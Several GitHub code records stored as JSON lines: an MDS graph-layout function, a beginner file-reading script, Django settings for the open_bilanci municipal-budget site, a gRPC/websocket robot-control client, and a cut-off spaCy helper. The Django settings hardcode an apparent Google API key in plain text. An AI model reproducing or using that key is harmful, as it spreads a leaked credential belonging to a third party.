np.max(A)\n approx = approximate_paths_lengths(A)\n\n for i, j in zip(*np.where(approx == 0)):\n if i != j:\n approx[i][j] = np.max([np.max(approx[i, :]), np.max(approx[:, j])])\n\n B = _construct_inner_product_matrix_(approx)\n\n X = calculate_embedding_matrix(B, m=2)\n\n ver = find_closest_vertex(X)\n\n return ver\n","repo_name":"PhantomOfTheOpera/GravitationalNetworkOptim","sub_path":"mds.py","file_name":"mds.py","file_ext":"py","file_size_in_byte":4936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18381841441","text":"#First step: open the file that you want to read by using open function\nmyfile = open('mytext.txt', 'r')\n\n#print (myfile.read())\n\n#read all the text in the files by using readlines() function\n#print (myfile.readlines())\n\n#use for loop and also read the test in the file\nfor lines in myfile:\n print(myfile.readlines())\n\n\nmyfile.close()","repo_name":"MahmoudAhmadOsman/Python","sub_path":"Python Software Developer/readtextfile.py","file_name":"readtextfile.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30167538601","text":"\"\"\"Common settings and globals.\"\"\"\nimport os\nfrom os.path import abspath, basename, dirname, join, normpath\nfrom sys import path\nfrom datetime import datetime\nimport environ\n\nroot = environ.Path(__file__) - 4 # (/open_bilanci/bilanci_project/bilanci/settings/ - 4 = /)\n\n# set default values and casting\nenv = environ.Env(\n DEBUG=(bool, True),\n)\nenv.read_env(root('.env'))\n\n########## INSTANCE TYPE: production | staging | development | test\nINSTANCE_TYPE = env.str('INSTANCE_TYPE')\n\n########## PATH CONFIGURATION\nREPO_ROOT = root()\nPROJECT_ROOT = root('bilanci_project')\n\n# Add our project to our pythonpath, this way we don't need to type our project\n# name in our dotted import paths:\npath.append(PROJECT_ROOT)\n\n# Site name:\nSITE_ROOT = root('bilanci_project/bilanci')\nSITE_NAME = basename(SITE_ROOT)\nSITE_VERSION = 'beta'\n########## END PATH CONFIGURATION\n\n\n########## DEBUG CONFIGURATION\nDEBUG = env.bool('DEBUG', False)\nTEMPLATE_DEBUG = env.bool('TEMPLATE_DEBUG', False)\n########## END DEBUG CONFIGURATION\n\n\n########## MANAGER CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins\nADMINS = (\n ('Your Name', 'your_email@example.com'),\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers\nMANAGERS = ADMINS\n\n########## END MANAGER CONFIGURATION\n\n\n########## PROJECT_OWNERS CONFIGURATION\n# PROJECT_OWNERS WILL GET AN EMAIL WHEN IMPORT MNG TASK ARE COMPLETED\n\nPROJECT_OWNERS = (\n # ('Guglielmo Celata', 'guglielmo.celata@depp.it'),\n ('Stefano Vergani', 'stefano.vergani.it@gmail.com'),\n)\n\n\n########## DATABASE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases\nDATABASES = {\n 'default': env.db('DB_DEFAULT_URL'),\n}\n########## END DATABASE CONFIGURATION\n\n\n########## GENERAL CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone\nTIME_ZONE = 'Europe/Rome'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code\nLANGUAGE_CODE = 'it-IT'\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id\nSITE_ID = 1\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n\nUSE_I18N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n\nUSE_L10N = True\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz\nUSE_TZ = True\n########## END GENERAL CONFIGURATION\n\n\n########## MEDIA CONFIGURATION\nMEDIA_ROOT = root('assets')\nMEDIA_URL = '/media/'\n########## END MEDIA CONFIGURATION\n\n\n########## STATIC FILE CONFIGURATION\nSTATIC_ROOT = root('static')\nSTATIC_URL = '/static/'\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS\nSTATICFILES_DIRS = (\n normpath(join(PROJECT_ROOT, 'static')),\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders\nSTATICFILES_FINDERS = (\n 'django.contrib.staticfiles.finders.FileSystemFinder',\n 'django.contrib.staticfiles.finders.AppDirectoriesFinder',\n)\n########## END STATIC FILE CONFIGURATION\n\nOPENDATA_ROOT = root('open_data')\nOPENDATA_ZIP_ROOT = os.path.join(root(OPENDATA_ROOT), 'zip')\nOPENDATA_CSV_ROOT = os.path.join(root(OPENDATA_ROOT), 'csv')\nOPENDATA_XML_ROOT = os.path.join(root(OPENDATA_ROOT), 'xml')\nOPENDATA_URL = '/opendata/'\n\n\n########## SECRET CONFIGURATION\nSECRET_KEY = env('SECRET_KEY') # Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ\n########## END SECRET CONFIGURATION\n\n\n########## SITE CONFIGURATION\n# Hosts/domain names that are valid for this site\n# See https://docs.djangoproject.com/en/1.5/ref/settings/#allowed-hosts\nALLOWED_HOSTS = []\n########## END SITE CONFIGURATION\n\n\n########## FIXTURE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS\nFIXTURE_DIRS = (\n normpath(join(PROJECT_ROOT, 'fixtures')),\n)\n########## END FIXTURE CONFIGURATION\n\n\n########## TEMPLATE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors\nTEMPLATE_CONTEXT_PROCESSORS = (\n 'django.contrib.auth.context_processors.auth',\n 'django.core.context_processors.debug',\n 'django.core.context_processors.i18n',\n 'django.core.context_processors.media',\n 'django.core.context_processors.static',\n 'django.core.context_processors.tz',\n 'django.contrib.messages.context_processors.messages',\n 'django.core.context_processors.request',\n\n # bilanci project context processor\n 'bilanci.context_processor.main_settings',\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs\nTEMPLATE_DIRS = (\n normpath(join(PROJECT_ROOT, 'templates')),\n)\n########## END TEMPLATE CONFIGURATION\n\n\n########## MIDDLEWARE CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#middleware-classes\nMIDDLEWARE_CLASSES = (\n # Default Django middleware.\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n 'bilanci.middlewares.PrivateBetaMiddleware',\n 'bilanci.middlewares.ComuniServicesMiddleware',\n)\n########## END MIDDLEWARE CONFIGURATION\n\n\n########## URL CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf\nROOT_URLCONF = '%s.urls' % SITE_NAME\n########## END URL CONFIGURATION\n\n\n########## APP CONFIGURATION\nDJANGO_APPS = (\n # Default Django apps:\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'django.contrib.sitemaps',\n\n # Useful template tags:\n 'django.contrib.humanize',\n\n # Admin panel and documentation:\n 'django.contrib.admin',\n 'django.contrib.admindocs',\n\n # Django add-ons\n 'django_extensions',\n\n 'django.contrib.gis',\n)\n\nTHIRD_PARTY_APPS = (\n # Database migration helpers:\n 'south',\n 'django_select2',\n 'treeadmin',\n 'mptt',\n 'front',\n 'tinymce',\n 'robots',\n)\n\n# Apps specific for this project go here.\nLOCAL_APPS = (\n 'bilanci',\n 'territori',\n 'services',\n 'idioticon',\n 'shorturls',\n)\n\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps\nINSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS\n########## END APP CONFIGURATION\n\nPOSTGIS_VERSION = (2, 0, 0)\n\n\n########## LOGGING CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'formatters': {\n 'standard': {\n 'format': \"[%(asctime)s] %(levelname)s [%(name)s:%(lineno)s] %(message)s\",\n },\n 'reduced': {\n 'format': \"%(levelname)s %(message)s\"\n }\n },\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'standard'\n },\n 'test_console': {\n 'level': 'DEBUG',\n 'class': 'logging.StreamHandler',\n 'formatter': 'reduced'\n },\n 'import_logfile': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': REPO_ROOT + \"/log/import_logfile\",\n 'mode': 'w',\n 'formatter': 'standard',\n },\n 'import_logfile_append': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': REPO_ROOT + \"/log/import_logfile\",\n 'formatter': 'standard',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'bilanci_project': {\n 'handlers': ['console'],\n 'level': 'INFO',\n 'propagate': False,\n },\n\n 'management': {\n 'handlers': ['console', 'import_logfile'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'management_append': {\n 'handlers': ['console', 'import_logfile_append'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n 'test': {\n 'handlers': ['test_console'],\n 'level': 'DEBUG',\n 'propagate': False,\n },\n }\n}\n########## END LOGGING CONFIGURATION\n\n\n########## WSGI CONFIGURATION\n# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application\nWSGI_APPLICATION = 'wsgi.application'\n########## END WSGI CONFIGURATION\n\nOUTPUT_PATH = '../scraper_project/scraper/output/'\nLISTA_COMUNI = 'listacomuni.csv'\nLISTA_COMUNI_PATH = OUTPUT_PATH + LISTA_COMUNI\n\nS3_LISTA_COMUNI_URL = env('S3_LISTA_COMUNI_URL')\n\n# preventivi url\nURL_PREVENTIVI_QUADRI = \"http://finanzalocale.interno.it/apps/floc.php/certificati/index/codice_ente/%s/cod/3/anno/%s/md/0/cod_modello/PCOU/tipo_modello/U/cod_quadro/%s\"\n# consuntivi url\nURL_CONSUNTIVI_QUADRI = \"http://finanzalocale.interno.it/apps/floc.php/certificati/index/codice_ente/%s/cod/4/anno/%s/md/0/cod_modello/CCOU/tipo_modello/U/cod_quadro/%s\"\n\n# Google Account Oauth key\nOAUTH2_KEY_PATH=env('OAUTH2_KEY_PATH')\n\n# Google Docs keys\nGDOC_KEYS = {\n 'titoli_map': env('GDOC_TITOLI_MAP_KEY'),\n 'voci_map': env('GDOC_VOCI_MAP_KEY'),\n 'simple_map': env('GDOC_VOCI_SIMPLE_MAP_KEY'),\n 'simple_tree': env('GDOC_VOCI_SIMPLE_TREE_KEY'),\n 'bilancio_consuntivo_2013': env('GDOC_BILANCIO_CONSUNTIVO_2013'),\n 'bilancio_preventivo_2014': env('GDOC_BILANCIO_PREVENTIVO_2014'),\n 'bilancio_consuntivo_2014': env('GDOC_BILANCIO_CONSUNTIVO_2014'),\n 'bilancio_preventivo_2015': env('GDOC_BILANCIO_PREVENTIVO_2015')\n}\n\nCOUCHDB_RAW_NAME = 'bilanci'\nCOUCHDB_NORMALIZED_TITOLI_NAME = 'bilanci_titoli'\nCOUCHDB_NORMALIZED_VOCI_NAME = 'bilanci_voci'\nCOUCHDB_SIMPLIFIED_NAME = 'bilanci_simple'\n\nCOUCHDB_SERVERS = {\n 'localhost': {\n 'host': '127.0.0.1',\n 'port': '5984',\n 'user': env('COUCHDB_LOCALHOST_USER'),\n 'password': env('COUCHDB_LOCALHOST_PASSWORD'),\n },\n 'staging': {\n 'host': env('COUCHDB_STAGING_HOST'),\n 'port': env('COUCHDB_STAGING_PORT'),\n 'user': env('COUCHDB_STAGING_USER'),\n 'password': env('COUCHDB_STAGING_PASSWORD'),\n },\n}\nCOUCHDB_DEFAULT_SERVER = 'staging'\n\nCACHES = {\n \"default\": {\n \"BACKEND\": \"redis_cache.cache.RedisCache\",\n \"LOCATION\": \"127.0.0.1:6379:1\", # db 1\n \"TIMEOUT\": 0,\n \"OPTIONS\": {\n \"CLIENT_CLASS\": \"redis_cache.client.DefaultClient\",\n }\n }\n}\n\nCACHE_PAGE_DURATION_SECS = 3600\n\nSOUTH_TESTS_MIGRATE = False\n\n##\n# Application variables\n##\n\nGDP_DEFLATORS = {\n 2000: 0.777728432,\n 2001: 0.800109527,\n 2002: 0.825777358,\n 2003: 0.851531437,\n 2004: 0.871901728,\n 2005: 0.887745029,\n 2006: 0.902904158,\n 2007: 0.924337811,\n 2008: 0.947752751,\n 2009: 0.967550814,\n 2010: 0.971307248,\n 2011: 0.984445032,\n 2012: 1,\n 2013: 1.014412693,\n # TODO: update with real deflator value\n 2014: 1.014412693,\n 2015: 1.014412693,\n}\n\nCAPOLUOGHI_PROVINCIA = [u'agrigento-comune-ag', u'alessandria-comune-al', u'ancona-comune-an', u'andria-comune-bt',\n u'aosta-comune-ao', u'arezzo-comune-ar', u'ascoli-piceno-comune-ap',\n u'asti-comune-at', u'avellino-comune-av', u'bari-comune-ba', u'barletta-comune-bt',\n u'belluno-comune-bl', u'benevento-comune-bn', u'bergamo-comune-bg', u'biella-comune-bi',\n u'bologna-comune-bo',\n u'bolzano-bozen-comune-bz', u'brescia-comune-bs', u'brindisi-comune-br', u'cagliari-comune-ca',\n u'caltanissetta-comune-cl', u'campobasso-comune-cb', u'carbonia-comune-ci',\n u'caserta-comune-ce',\n u'catania-comune-ct', u'catanzaro-comune-cz', u'chieti-comune-ch', u'como-comune-co',\n u'cosenza-comune-cs', u'cremona-comune-cr', u'crotone-comune-kr', u'cuneo-comune-cn',\n u'enna-comune-en',\n u'fermo-comune-fm', u'ferrara-comune-fe', u'firenze-comune-fi', u'foggia-comune-fg',\n u'forli-comune-fc', u'frosinone-comune-fr', u'genova-comune-ge', u'gorizia-comune-go',\n u'grosseto-comune-gr',\n u'iglesias-comune-ci', u'imperia-comune-im', u'isernia-comune-is', u'lanusei-comune-og',\n u'laquila-comune-aq', u'la-spezia-comune-sp', u'latina-comune-lt', u'lecce-comune-le',\n u'lecco-comune-lc',\n u'livorno-comune-li', u'lodi-comune-lo', u'lucca-comune-lu', u'macerata-comune-mc',\n u'mantova-comune-mn', u'massa-comune-ms', u'matera-comune-mt', u'messina-comune-me',\n u'milano-comune-mi',\n u'modena-comune-mo', u'monza-comune-mb', u'napoli-comune-na', u'novara-comune-no',\n u'nuoro-comune-nu', u'olbia-comune-ot', u'oristano-comune-or', u'padova-comune-pd',\n u'palermo-comune-pa', u'parma-comune-pr',\n u'pavia-comune-pv', u'perugia-comune-pg', u'pesaro-comune-pu', u'pescara-comune-pe',\n u'piacenza-comune-pc', u'pisa-comune-pi', u'pistoia-comune-pt', u'pordenone-comune-pn',\n u'potenza-comune-pz',\n u'prato-comune-po', u'ragusa-comune-rg', u'ravenna-comune-ra', u'reggio-di-calabria-comune-rc',\n u'reggio-nellemilia-comune-re', u'rieti-comune-ri', u'rimini-comune-rn', u'roma-comune-rm',\n u'rovigo-comune-ro', u'salerno-comune-sa', u'sanluri-comune-vs', u'sassari-comune-ss',\n u'savona-comune-sv', u'siena-comune-si', u'siracusa-comune-sr', u'sondrio-comune-so',\n u'taranto-comune-ta',\n u'tempio-pausania-comune-ot', u'teramo-comune-te', u'terni-comune-tr', u'torino-comune-to',\n u'tortoli-comune-og', u'trani-comune-bt', u'trapani-comune-tp', u'trento-comune-tn',\n u'treviso-comune-tv',\n u'trieste-comune-ts', u'udine-comune-ud', u'urbino-comune-pu', u'varese-comune-va',\n u'venezia-comune-ve', u'verbania-comune-vb', u'vercelli-comune-vc', u'verona-comune-vr',\n u'vibo-valentia-comune-vv', u'vicenza-comune-vi', u'villacidro-comune-vs', u'viterbo-comune-vt']\n\n##\n# OP API VARIABLES:\n##\n\nOP_BLOG_CATEGORY = 'neibilanci'\nOP_API_DOMAIN = env('OP_API_DOMAIN')\nOP_API_USERNAME = env('OP_API_USERNAME')\nOP_API_PASSWORD = env('OP_API_PASSWORD')\n\n##\n# COOKIES\n# expiration time for a data in a session (seconds)\n##\n\nSESSION_COOKIE_AGE = 7200\nSESSION_SAVE_EVERY_REQUEST = True\n\n##\n# TIMELINE VARIABLES:\n# set the start / end of the time span considered\n##\n\nAPP_DATE_FMT = '%Y-%m-%d'\n\nAPP_START_YEAR = 2005\nAPP_END_YEAR = 2015\nAPP_START_DATE = datetime.strptime(\"{0}-01-01\".format(APP_START_YEAR), APP_DATE_FMT)\nAPP_END_DATE = datetime.strptime(\"{0}-12-31\".format(APP_END_YEAR), APP_DATE_FMT)\n\nLAST_VALID_CONSUNTIVO_YEAR = 2013\nCLASSIFICHE_START_YEAR = APP_START_DATE.year\nCLASSIFICHE_END_YEAR = LAST_VALID_CONSUNTIVO_YEAR\n\nTERRITORI_CONTEXT_REFERENCE_YEAR = CLASSIFICHE_END_YEAR\n\n##\n# BILANCIO GRAPHS VARIABLES:\n# set the start / end of the Sindaci timeline and line graphs in the Bilancio Pages\n##\n\n\n# define lines color of the SINDACO marker on the timeline\nINCARICO_MARKER_INACTIVE = '#b9c6c4'\nINCARICO_MARKER_DUMMY = '/static/img/incarico_dummy.png'\nINCARICO_MARKER_COMMISSARIO = '/static/img/commissario.png'\n\n# defines the color of the line graph\nTERRITORIO_1_COLOR = '#cc6633'\nTERRITORIO_2_COLOR = '#a51206'\n\nCLUSTER_LINE_COLOR = '#f7b5a1'\n\nDEFAULT_INDICATOR_SLUG = 'autonomia-finanziaria'\nDEFAULT_VOCE_SLUG_CONFRONTI = 'consuntivo-entrate-cassa-imposte-e-tasse'\nDEFAULT_VOCE_SLUG_CLASSIFICHE = DEFAULT_VOCE_SLUG_CONFRONTI\n\nINDICATOR_COLORS = ['#cc6633',\n '#f7da94',\n '#913d6a',\n '#999924',\n '#993527',\n '#c3a150',\n '#666c14',\n '#5f6b78',\n '#e2a8b0',\n '#c6d041']\n\n# euros range to define two sums equal\n# due to round of floats to integers,\n# can be as large as 10\nNEARLY_EQUAL_THRESHOLD = 10\n\n# LOGIN_URL defines the name of the view to be called\n# when an unauthorized user tries to access a passw-protected view\nLOGIN_URL = 'login'\n\n# defines Mailbin server address to push temporary home page form user data\nMAILBIN_SERVER_HOST = 'mailbin.openpolis.it'\nMAILBIN_QUEUE_ADDR = \"tcp://{0}:5558\".format(MAILBIN_SERVER_HOST)\nGOOGLE_SHORTENER_API_KEY = 'AIzaSyAzTAcojoJMKV3eh8XAsE3CP7hpgmms17M'\nGOOGLE_SHORTENER_URL = \"https://www.googleapis.com/urlshortener/v1/url\"\n\nTINYMCE_DEFAULT_CONFIG = {'theme': \"advanced\", 'relative_urls': False}\n\n# voce bilancio slugs of funzioni sum branches\nPREVENTIVO_SOMMA_SPESE_FUNZIONI_SLUG = 'preventivo-spese-spese-somma-funzioni'\nCONSUNTIVO_SOMMA_SPESE_FUNZIONI_SLUG = 'consuntivo-spese-cassa-spese-somma-funzioni'\nCONSUNTIVO_SPESE_INVESTIMENTI_INTERVENTI_SLUG = 'consuntivo-spese-cassa-spese-per-investimenti-interventi'\nCONSUNTIVO_SPESE_CORRENTI_INTERVENTI_SLUG = 'consuntivo-spese-cassa-spese-correnti-interventi'\n\nHOSTS_COMUNI=[]\n\nCLASSIFICHE_PAGINATE_BY = 15\nEARLYBIRD_ENABLE = env.bool('EARLYBIRD_ENABLE')\n\nENABLED_STATIC_PAGES = [\n 'faq',\n 'indicatori',\n 'bilancio_comune',\n 'mappa',\n 'confronti',\n 'classifiche',\n 'software',\n 'licenze',\n 'informativa',\n 'credits',\n]\n","repo_name":"DeppSRL/open_bilanci","sub_path":"bilanci_project/bilanci/settings/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":18577,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"32639801767","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nfrom urllib.request import urlopen \nimport json\nimport websocket\nimport _thread\nimport grpc\nimport sys\nfrom code_engine_client import bot_api_conn_grpc_pb2\nfrom code_engine_client import bot_api_conn_grpc_pb2_grpc\nimport sys\nimport importlib\nfrom concurrent.futures import ThreadPoolExecutor\n\n\n\nclass CodeEngineClient:\n bot_config_url = \"https://apps-1254429489.cos.ap-beijing.myqcloud.com/enable_bot/enable_bot_config.json\"\n event_ws_url = \"ws://jimugaoshou.com:50510/code\"\n cmd_svr_url = \"jimugaoshou.com:50501\"\n\n def __init__(self, openid, id):\n self.openid = openid\n self.id = id\n self.bot_config_map = {}\n self.drive_config_map = {}\n self.cmd_client = None\n self.event_client = None\n self.threads = None\n\n # outter functions\n def init(self):\n self.load_bot_config()\n self.load_drive_config()\n\n def run(self):\n self.init_net()\n self.init_threads()\n self.event_client.run_forever()\n\n def cmd_motor(self, bot_index, tag, x):\n print(\"cmd_motor\")\n msg = self.format_cmd_motor_msg(bot_index, tag, x)\n self.send_cmd_msg(msg)\n\n def cmd_led(self, bot_index, tag, x):\n print(\"cmd_led\")\n msg = self.format_cmd_led_msg(bot_index, tag, x)\n self.send_cmd_msg(msg)\n\n # end outter functions\n\n\n # inner functions\n def init_net(self):\n self.cmd_client = self.init_cmd_client()\n self.event_client = self.init_event_client()\n\n # share cmd client, and not init event client, just for code engine svr\n def attach_net(self, cmd_client):\n self.cmd_client = cmd_client\n\n # thread pool\n def init_threads(self):\n self.threads = ThreadPoolExecutor(max_workers=10)\n\n def load_bot_config(self):\n self.bot_config_map = self.get_json_from_url(CodeEngineClient.bot_config_url)\n\n def load_drive_config(self):\n url = \"https://imgs-1254429489.cos.ap-beijing.myqcloud.com/drive/\"+self.openid+\"/\"+self.id+\".json\"\n self.drive_config_map = self.get_json_from_url(url)\n\n def get_json_from_url(self, url):\n html = urlopen(url)\n data = html.read()\n return json.loads(data)\n\n def init_cmd_client(self):\n print(\"init_cmd_client\")\n channel = grpc.insecure_channel(CodeEngineClient.cmd_svr_url)\n return bot_api_conn_grpc_pb2_grpc.BotApiConnGrpcStub(channel)\n\n def init_event_client(self):\n websocket.enableTrace(True)\n return websocket.WebSocketApp(CodeEngineClient.event_ws_url,\n on_open=self.event_on_open,\n on_message=self.event_on_message,\n on_error=self.event_on_error,\n on_close=self.event_on_close)\n\n def event_on_open(self, ws):\n print(\"event_on_open\")\n self.send_event_init_msg(ws)\n\n def event_on_message(self, ws, message):\n print(\"event_on_message\")\n msg = json.loads(message)\n\n if msg[\"cmd\"] == \"event\":\n self.event_loop(msg)\n\n def event_on_error(self, ws, error):\n print(\"event_on_error\")\n\n def event_on_close(self, ws, close_status_code, close_msg):\n print(\"event_on_close\")\n\n def event_loop(self, msg):\n print(\"event_loop\")\n\n if msg[\"cmd\"] == \"event\":\n self.process_event(msg)\n elif msg[\"cmd\"] == \"sensor\":\n self.process_sensor(msg)\n\n def process_event(self, msg):\n module_name = self.get_local_module_name()\n function_name, param_cnt = self.get_function_name(msg[\"seq\"])\n\n if function_name != \"\":\n fun_path = module_name+\".\"+function_name\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"x\"], msg[\"y\"],'','','','')\n else:\n print(\"unknown msg\")\n\n\n def process_sensor(self, msg):\n module_name = self.get_local_module_name()\n function_name, param_cnt = self.get_sensor_function_name(msg[\"model\"])\n\n if function_name != \"\":\n fun_path = module_name+\".\"+function_name\n\n if msg[\"model\"] == \"line\":\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"result\"][\"exist\"], msg[\"result\"][\"offset\"],'','','','')\n elif msg[\"model\"] == \"color\":\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"result\"][\"r\"], msg[\"result\"][\"g\"],msg[\"result\"][\"b\"],'','','')\n elif msg[\"model\"] == \"qrcode\":\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"result\"][\"url\"], '','','','','')\n elif msg[\"model\"] == \"tflite\":\n self.threads.submit(self.dynamic_run, fun_path, param_cnt, msg[\"result\"][\"label\"], msg[\"result\"][\"confidence\"],msg[\"result\"][\"x\"],msg[\"result\"][\"y\"],msg[\"result\"][\"w\"],msg[\"result\"][\"h\"])\n\n else:\n print(\"unknown msg\")\n\n\n def get_local_module_name(self):\n filename = sys.argv[0].split('/')[-1][0:-3]\n return filename\n\n def get_seq_function_name(self, seq):\n\n param_cnt = 1\n function_name = \"\"\n for unit in self.drive_config_map[\"units\"]:\n if unit['seq'] == seq:\n if unit['ui']['type'] == \"joystick\":\n param_cnt = 2\n\n function_name = \"on_event_\"+unit['ui']['type']+\"_\"+str(seq)\n\n return function_name, param_cnt\n\n def get_sensor_function_name(self, model):\n param_cnt = 1\n function_name = \"\"\n\n if model == \"line\":\n param_cnt = 2\n function_name = \"on_sensor_line\"\n elif model == \"color\":\n param_cnt = 3\n function_name = \"on_sensor_color\"\n elif model == \"tflite\":\n param_cnt = 6\n function_name = \"on_sensor_tflite\"\n elif model == \"qrcode\":\n param_cnt = 1\n function_name = \"on_sensor_qrcode\"\n\n return function_name, param_cnt\n\n\n def reload_module(self, module_path):\n\n tmp = importlib.util.find_spec(module_path)\n if tmp == None:\n return None\n\n tmp = importlib.import_module(module_path)\n importlib.reload(tmp)\n\n return tmp\n\n def dynamic_run(self, fun_path, param_cnt, x1, x2, x3, x4, x5, x6):\n\n # try:\n module_path = fun_path.split('.')[0]\n fun_name = fun_path.split('.')[1]\n\n mod = self.reload_module(module_path)\n\n if hasattr(mod, fun_name):\n if param_cnt == 1:\n eval(\"mod.\"+fun_name)(self, x1)\n elif param_cnt == 2:\n eval(\"mod.\"+fun_name)(self, x1, x2)\n elif param_cnt == 3:\n eval(\"mod.\"+fun_name)(self, x1, x2, x3)\n elif param_cnt == 4:\n eval(\"mod.\"+fun_name)(self, x1, x2, x3, x4)\n elif param_cnt == 5:\n eval(\"mod.\"+fun_name)(self, x1, x2, x3, x4, x5)\n elif param_cnt == 6:\n eval(\"mod.\"+fun_name)(self, x1, x2, x3, x4, x5, x6)\n else:\n print(\"Error, no such function : \"+fun_path)\n\n # except:\n # print(\"Error dynamic_run, fun_path : \"+fun_path+\", params : \"+str(x1))\n\n\n def send_event_init_msg(self, ws):\n msg = {\"openid\": self.openid, \"id\": self.id, \"cmd\":\"init\"}\n data = json.dumps(msg)\n ws.send(data)\n\n\n def format_cmd_motor_msg(self, bot_index, tag, x):\n\n a1, a2 = self.get_pins_of_tag(tag)\n\n # format cmd\n msg = {\n \"app_version\":\"1.0.0\",\n \"app_os\": \"api\",\n \"openid\": self.openid,\n \"cmd\": \"base\",\n \"bot_id\": self.get_bot_id_of_index(bot_index),\n \"a1\": a1,\n \"a2\": a2,\n \"speed\": x\n }\n\n return msg\n\n def format_cmd_led_msg(self, bot_index, tag, x):\n # format cmd\n a1, a2 = self.get_pins_of_tag(tag)\n\n # format cmd\n msg = {\n \"app_version\":\"1.0.0\",\n \"app_os\": \"api\",\n \"openid\": self.openid,\n \"cmd\": \"base\",\n \"bot_id\": self.get_bot_id_of_index(bot_index),\n \"a1\": a1,\n \"a2\": a2,\n \"speed\": x\n }\n\n return msg\n\n def get_pins_of_tag(self, tag):\n return self.bot_config_map['control_bot']['base'][tag+'1'], self.bot_config_map['control_bot']['base'][tag+'2']\n\n def get_bot_id_of_index(self, bot_index):\n bots = self.drive_config_map[\"bots\"]\n if bot_index < len(bots):\n return bots[bot_index]\n else:\n return \"\"\n\n def send_cmd_msg(self, msg):\n # format req\n req = bot_api_conn_grpc_pb2.SendBotMsgRequest(openid = msg[\"openid\"], bot_id = msg[\"bot_id\"], cmd = msg[\"cmd\"], msg = json.dumps(msg))\n\n # send msg\n resp = self.cmd_client.SendBotMsg(req)\n\n\n # end inner functions\n","repo_name":"moc-master/code_engine_client","sub_path":"code_engine_client/code_engine_client.py","file_name":"code_engine_client.py","file_ext":"py","file_size_in_byte":8114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3029890456","text":"from spacy.tokens import Span\nfrom spacy.parts_of_speech import CONJ, DET, NOUN, VERB\nimport itertools\n\nSUBJ_DEPS = {\"agent\", \"csubj\", \"csubjpass\", \"expl\", \"nsubj\", \"nsubjpass\"}\nOBJ_DEPS = {\"attr\", \"dobj\", \"dative\", \"oprd\"}\nAUX_DEPS = {\"aux\", \"auxpass\", \"neg\"}\n\n\ndef get_main_verbs_of_sent(sent):\n \"\"\"Return the main (non-auxiliary) verbs in a sentence.\"\"\"\n return [\n tok for tok in sent if tok.pos == VERB and tok.dep_ not in AUX_DEPS\n ]\n\n\ndef get_subjects_of_verb(verb):\n \"\"\"Return all subjects of a verb according to the dependency parse.\"\"\"\n subjs = [tok for tok in verb.lefts if tok.dep_ in SUBJ_DEPS]\n # get additional conjunct subjects\n subjs.extend(tok for subj in subjs for tok in _get_conjuncts(subj))\n return subjs\n\n\ndef 